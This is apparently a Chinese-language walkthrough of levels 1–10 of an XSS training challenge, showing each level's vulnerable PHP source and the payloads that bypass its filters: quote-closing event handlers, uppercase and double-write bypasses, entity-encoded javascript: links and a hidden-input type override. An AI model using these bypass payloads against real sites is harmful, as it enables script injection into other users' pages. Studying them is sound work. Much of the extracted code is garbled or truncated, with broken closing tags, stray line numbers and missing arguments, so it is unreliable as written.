XSS挑战之旅1-10关

---

前言

漏洞介绍：XSS漏洞
参考文章：XSS挑战之旅
游戏规则：触发alert()弹窗，进入下一关

---

第1关

1. 进入第一关
   

2. 随便输入一下，观测输出，看源代码
   

3. 输入语句进行测试，触发弹窗，进入第二关
   

4. 源码

   DOCTYPE html><html>
   	<head>
   		<meta http-equiv="content-type" content="text/html;charset=utf-8">
   		<script>
   			window.alert = function()  //触发alert(),进入下一关
   			{     
   				confirm("完成的不错！");
   				 window.location.href="level2.php?keyword=test"; 
   			}
   		script>
   		<title>欢迎来到level1title>
   	head>
   	<body>
   		<h1 align=center>欢迎来到level1h1>
   			欢迎用户".$str.""; //直接对传入的参数进行输出,没有过滤
   			?>
   			<center><img src=level1.png>center>
   			payload的长度:".strlen($str)."";
   			?>
   	body>
   html>
   1
   2
   3
   4
   5
   6
   7
   8
   9
   10
   11
   12
   13
   14
   15
   16
   17
   18
   19
   20
   21
   22
   23
   24
   25

5. 分析浏览器加载的结果

   	1 ------------------------------------------------
   	$str=<script>alert(1)script>
   	<h2 align=center>欢迎用户".$str."h2>
   	
   	2 ------------------------------------------------
   	<h2 align=center>欢迎用户<script>alert(1)script>h2>
   	
   	3 ------------------------------------------------
   	<h2 align=center>欢迎用户
   		<script>
   			alert(1) //触发alert()函数
   		script>
   	h2>
   1
   2
   3
   4
   5
   6
   7
   8
   9
   10
   11
   12
   13

第2关

1. 输入语句进行测试
   

2. 查看网页源代码
   

3. 补充：htmlspecialchars($str)
   

4. 分析浏览器加载的结果

   <input name=keyword  value="">     //这里的<script>alert(1)script>是字符串
   <input name=keyword  value="11111">"<script>alert(1)script>">   //闭合引号,这里的<script>alert(1)script>可以被浏览器加载
   ------------------------------------------------
   <input name=keyword  value="11111">
   "
   <script>
   	alert(1)
   script>
   ">
   1
   2
   3
   4
   5
   6
   7
   8
   9

5. 进入下一关
   

6. 源代码

    
   	ini_set("display_errors", 0);
   	$str = $_GET["keyword"];
   	echo "
   没有找到和".htmlspecialchars($str)."相关的结果.
   ".'
   		
   
   		.$str.'">   //闭合value值
   		
   		
   	';
   ?>
   1
   2
   3
   4
   5
   6
   7
   8
   9
   10

第3关

1. 输入语句进行测试
   

2. 测试，看效果修改
   

3. payload

   <input name=keyword  value='11111' onclick='alert(1)'>
   1

   

4. 下一关
   

5. 源码

    
   	ini_set("display_errors", 0);
   	$str = $_GET["keyword"];
   	echo "
   没有找到和".htmlspecialchars($str)."相关的结果.
   "."
   	
   
   	  //转义了再拼接进去
   	
   	
   	";
   ?>
   1
   2
   3
   4
   5
   6
   7
   8
   9
   10

第4关

1. 输入语句进行测试
   

2. 继续测试11111' onclick='alert(1)
   

3. 测试11111" onclick="alert(1)
   

4. 下一关
   

5. 源码

    
   	ini_set("display_errors", 0);
   	$str = $_GET["keyword"];
   	$str2=str_replace(">","",$str); //替换了< >
   	$str3=str_replace("<","",$str2);
   	echo "
   没有找到和".htmlspecialchars($str)."相关的结果.
   ".'
   			
   
   			.$str3.'">
   			
   			
   			';
   ?>
   1
   2
   3
   4
   5
   6
   7
   8
   9
   10
   11
   12

第5关

1. 输入语句进行测试
   

2. 测试
   

3. 测试

   123">
   1

   

4. 浏览器加载效果

5. 源码

    
   	ini_set("display_errors", 0);
   	$str = strtolower($_GET["keyword"]);  //不能用大写过滤
   	$str2=str_replace(",",$str); //过滤了script
   	$str3=str_replace("on","o_n",$str2);  //过滤了on
   	echo "
   没有找到和".htmlspecialchars($str)."相关的结果.
   ".'
   		
   
   		.$str3.'">
   		
   		
   		';
   ?>
   1
   2
   3
   4
   5
   6
   7
   8
   9
   10
   11
   12

第6关

1. 大写绕过
   

2. 源码

    
   	ini_set("display_errors", 0);
   	$str = $_GET["keyword"];
   	//过滤下面这些关键字,可以用大写绕过
   	$str2=str_replace(",",$str); 
   	$str3=str_replace("on","o_n",$str2);
   	$str4=str_replace("src","sr_c",$str3);
   	$str5=str_replace("data","da_ta",$str4);
   	$str6=str_replace("href","hr_ef",$str5);
   	//对< >转义了
   	echo "
   没有找到和".htmlspecialchars($str)."相关的结果.
   ".'
   		
   
   		.$str6.'">
   		
   		
   		';
   ?>
   1
   2
   3
   4
   5
   6
   7
   8
   9
   10
   11
   12
   13
   14
   15
   16
   17

第7关

1. 测试
   

2. 测试绕过
   
   

3. 双写绕过

第8关

1. 测试
   

2. 将script用实体编号绕过
   

   <a href="javascript:alert(1)">友情链接a>
   html编码
   <a href="javascript:alert(1)">友情链接a>
   1
   2
   3

3. 下一关
   

4. 源码

    
   	ini_set("display_errors", 0);
   	$str = strtolower($_GET["keyword"]);  //过滤大写
   	$str2=str_replace("script","scr_ipt",$str);  //过滤这些关键字
   	$str3=str_replace("on","o_n",$str2);
   	$str4=str_replace("src","sr_c",$str3);
   	$str5=str_replace("data","da_ta",$str4);
   	$str6=str_replace("href","hr_ef",$str5);
   	$str7=str_replace('"','"',$str6);  //过滤 "
   	echo '
   	
   
   	.htmlspecialchars($str).'">   //过滤< > 
   	
   	
   	';
   ?>
   <?php
    	echo '
   .$str7.'">友情链接';  //利用点,绕过上面的限制即可
   ?>
   1
   2
   3
   4
   5
   6
   7
   8
   9
   10
   11
   12
   13
   14
   15
   16
   17
   18
   19

第9关

1. html的注释符号//

2. 源码

    
   	ini_set("display_errors", 0);
   	$str = strtolower($_GET["keyword"]);
   	......
   	//和上一题一样
   	......
   ?>
   <?php
   	if(false===strpos($str7,'http://')) //如果str7没有http://则返回false
   	{
   	  echo '
   友情链接';
   	        }
   	else
   	{
   	  echo '
   .$str7.'">友情链接';
   	}
   ?>
   1
   2
   3
   4
   5
   6
   7
   8
   9
   10
   11
   12
   13
   14
   15
   16
   17

3. 测试
   

4. payload

   友情链接
   1

   

第10关

1. 页面
   

2. 测试

3. 过滤了< 和>
   

4. 测试

   <input name="t_sort"  value="1111" onclick="alert(1)" type="hidden">
   1

   

5. payload

   <input name="t_sort"  value="1111" onclick="alert(1)" type="text" type="hidden">
   利用HTML语言的解析顺序,使得type="text"
   1
   2

   

6. 源码

    
   	ini_set("display_errors", 0);
   	$str = $_GET["keyword"];  //传入参数
   	$str11 = $_GET["t_sort"];
   	$str22=str_replace(">","",$str11);  //过滤< >
   	$str33=str_replace("<","",$str22);
   	echo "
   没有找到和".htmlspecialchars($str)."相关的结果.
   ".'
   	
   
   	.'" type="hidden">
   	.'" type="hidden">
   	.$str33.'" type="hidden">  //注入点
   	
   	';
   ?>
   1
   2
   3
   4
   5
   6
   7
   8
   9
   10
   11
   12
   13
   14